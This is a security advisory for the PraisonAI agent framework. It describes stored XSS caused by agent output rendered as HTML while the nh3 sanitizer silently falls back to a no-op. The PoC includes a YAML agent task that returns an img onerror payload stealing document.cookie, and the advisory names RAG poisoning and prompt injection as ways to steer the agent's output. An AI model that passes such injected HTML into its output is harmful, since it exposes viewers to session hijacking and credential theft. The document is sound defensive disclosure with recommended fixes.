PraisonAI Vulnerable to Stored XSS via Unsanitized Agent Output in HTML Rendering (nh3 Not a Required Dependency)

Moderate severity • GitHub Reviewed • Published Apr 9, 2026 in MervinPraison/PraisonAI • Updated Apr 10, 2026

Package

PraisonAI (pip)

Affected versions

< 4.5.128

Patched versions

4.5.128

Description

Summary

The Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output.

Details

In src/praisonai/api.py, lines 6-14 define the sanitizer with a try/except ImportError fallback:

try:
    import nh3
    def _sanitize_html(html: str) -> str:
        return nh3.clean(html)
except ImportError:
    def _sanitize_html(html: str) -> str:
        """Fallback: no nh3, return as-is (install nh3 for XSS protection)."""
        return html

The home() route at lines 21-25 converts agent output to HTML via markdown.markdown() (which preserves raw HTML tags by default) and embeds it in an HTML response using an f-string — bypassing Flask's Jinja2 auto-escaping:

@app.route('/')
def home():
    output = basic()
    html_output = _sanitize_html(markdown.markdown(str(output)))
    return f'<html><body>{html_output}</body></html>'

Since nh3 is not in any dependency list (pyproject.toml core deps, optional deps, or requirements files), a standard installation will always hit the fallback path. The markdown library's default behavior passes through raw HTML tags in input text, so any <script> or event handler attributes in the agent output flow directly into the response.
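To make the data flow concrete, here is a minimal sketch that uses only the Python standard library. It assumes a stand-in `noop_sanitize` that mirrors the fallback branch above and a hypothetical `render_page` helper that mimics the f-string in home(); neither name comes from PraisonAI. `html.escape` appears only as a contrast to show what escaping would change, not as the project's actual fix.

```python
import html

PAYLOAD = "<img src=x onerror=alert(document.cookie)>"


def noop_sanitize(markup: str) -> str:
    """Stand-in for the ImportError fallback: returns its input unchanged."""
    return markup


def render_page(body: str) -> str:
    """Hypothetical helper mimicking the f-string response built in home()."""
    return f"<html><body>{body}</body></html>"


# Fallback path: the payload reaches the response unchanged.
unsafe_page = render_page(noop_sanitize(PAYLOAD))

# Contrast: escaping turns the markup into inert text.
escaped_page = render_page(html.escape(PAYLOAD))

print(unsafe_page)
print(escaped_page)
```

In the first page the browser sees a real img element with an onerror handler. In the second it sees only text, because `<` and `>` have been replaced by `&lt;` and `&gt;`.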

Additionally, deploy.py:76-91 generates a deployment version of api.py that has no sanitization at all — it directly calls markdown.markdown(output) without any _sanitize_html wrapper.

PoC

  1. Set up a PraisonAI instance with an agent that processes external content (e.g., web scraping or RAG retrieval):
# agents.yaml
framework: crewai
topic: test
roles:
  researcher:
    role: Researcher
    goal: Process user-provided content
    backstory: You process content exactly as given
    tasks:
      process:
        description: "Return this exact text: <img src=x onerror=alert(document.cookie)>"
        expected_output: The text as-is
  2. Verify nh3 is not installed (default):
pip show nh3 2>&1 | grep -c "not found"
# Returns 1 (not installed)
  3. Start the API:
python src/praisonai/api.py
  4. Access the endpoint:
curl http://localhost:5000/
  5. Response contains unsanitized HTML:
<html><body><p><img src=x onerror=alert(document.cookie)></p></body></html>
  6. Opening this in a browser executes the JavaScript payload.
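The check on the response body can also be automated. The sketch below uses the standard library's `html.parser` to flag `<script>` tags and `on*` event-handler attributes in a response. The class and function names are hypothetical, and the check is a rough heuristic for confirming the PoC, not a complete XSS detector (for instance, it ignores `javascript:` URLs).

```python
from html.parser import HTMLParser


class ActiveContentFinder(HTMLParser):
    """Collects <script> tags and on* event-handler attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names before calling this.
        if tag == "script":
            self.findings.append("<script>")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}=...>")


def find_active_content(body: str) -> list[str]:
    """Return a list of script tags and event handlers found in body."""
    finder = ActiveContentFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


poc_response = (
    "<html><body><p><img src=x onerror=alert(document.cookie)></p></body></html>"
)
print(find_active_content(poc_response))
```

An empty list for the same request after upgrading would suggest the payload is no longer rendered as live markup, although a manual browser check remains the more reliable confirmation.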

Impact

  • Session hijacking: An attacker can steal cookies or session tokens from users viewing the API output.
  • Credential theft: Injected scripts can present fake login forms or exfiltrate data to attacker-controlled servers.
  • Actions on behalf of users: Malicious JavaScript can perform actions in the context of the victim's browser session.

The attack surface includes any scenario where agent output contains attacker-influenced content: RAG retrieval from poisoned documents, web scraping of malicious pages, processing of adversarial user prompts, or multi-agent communication where one agent's output is tainted.

Recommended Fix

Make nh3 a required dependency when using the API, and remove the silent fallback:

# Option 1: Make nh3 required in pyproject.toml under the "api" optional dependency
# In pyproject.toml:
# api = [
#     "flask>=3.0.0",
#     ...
#     "nh3>=0.2.14",
# ]

# Option 2: Keep nh3 optional, but strip all HTML tags with a regex when it is missing
# (markdown.markdown() itself passes raw HTML through by default)
import markdown

def _sanitize_html(html: str) -> str:
    try:
        import nh3
        return nh3.clean(html)
    except ImportError:
        import re
        return re.sub(r'<[^>]+>', '', html)  # Strip all HTML tags as fallback

# Option 3 (preferred): Use Flask's Jinja2 templating with auto-escaping
# instead of f-string interpolation, or use markupsafe.escape().
# The route below keeps the f-string but fails closed when nh3 is missing.
from markupsafe import Markup

@app.route('/')
def home():
    output = basic()
    # Use markdown with safe extensions only
    html_output = markdown.markdown(str(output), extensions=[])
    try:
        import nh3
        html_output = nh3.clean(html_output)
    except ImportError:
        raise RuntimeError("nh3 is required for safe HTML rendering. Install with: pip install nh3")
    return f'<html><body>{html_output}</body></html>'

Also fix deploy.py:76-91 to include sanitization in the generated api.py.
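One caveat on the regex fallback in Option 2: the pattern `<[^>]+>` only removes sequences that contain a closing `>`, so a fragment without one is returned unchanged. Whether such a fragment can reach the fallback depends on what markdown.markdown() emits for a given input, which this sketch does not test. As an alternative under that assumption, the hypothetical `escape_fallback` below escapes every HTML metacharacter with the standard library's `html.escape`. The trade-off is that the markdown-generated tags are escaped too, so the output is shown as literal text rather than formatted HTML.

```python
import html
import re

TAG_RE = re.compile(r"<[^>]+>")


def regex_strip(markup: str) -> str:
    """The Option 2 fallback: remove anything shaped like <...>."""
    return TAG_RE.sub("", markup)


def escape_fallback(markup: str) -> str:
    """Alternative fallback (hypothetical): escape all HTML metacharacters."""
    return html.escape(markup)


well_formed = "<img src=x onerror=alert(1)>"
unclosed = "<img src=x onerror=alert(1) "

print(repr(regex_strip(well_formed)))    # tag removed entirely
print(repr(regex_strip(unclosed)))       # no closing '>', so nothing is removed
print(repr(escape_fallback(unclosed)))   # '<' becomes '&lt;'
```

Failing closed, as in Option 3, avoids the question altogether; an escaping fallback is only relevant if the endpoint must keep responding when nh3 is absent.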

References

@MervinPraison MervinPraison published to MervinPraison/PraisonAI Apr 9, 2026
Published by the National Vulnerability Database Apr 9, 2026
Published to the GitHub Advisory Database Apr 10, 2026
Reviewed Apr 10, 2026
Last updated Apr 10, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
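
The overall score is not shown on this page, but it can be derived from the vector string. The sketch below applies the base-score equations and metric weights from the CVSS v3.1 specification, restricted to Scope: Unchanged because that is all this vector needs. The function names are illustrative, and the result should be read as a derivation from the vector rather than a figure quoted from the advisory.

```python
import math

# Metric weights from the CVSS v3.1 specification (scope-unchanged values only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with Scope: Unchanged."""
    parts = dict(item.split(":") for item in vector.split("/"))
    if parts.get("S") != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {metric: WEIGHTS[metric][parts[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"))  # 5.4
```

For this vector the impact sub-score is about 2.51 and the exploitability sub-score about 2.84, which sum to roughly 5.35 and round up to 5.4. That falls in the 4.0 to 6.9 band, consistent with the Moderate rating above.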

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

CVE-2026-40112

GHSA ID

GHSA-cfg2-mxfj-j6pw
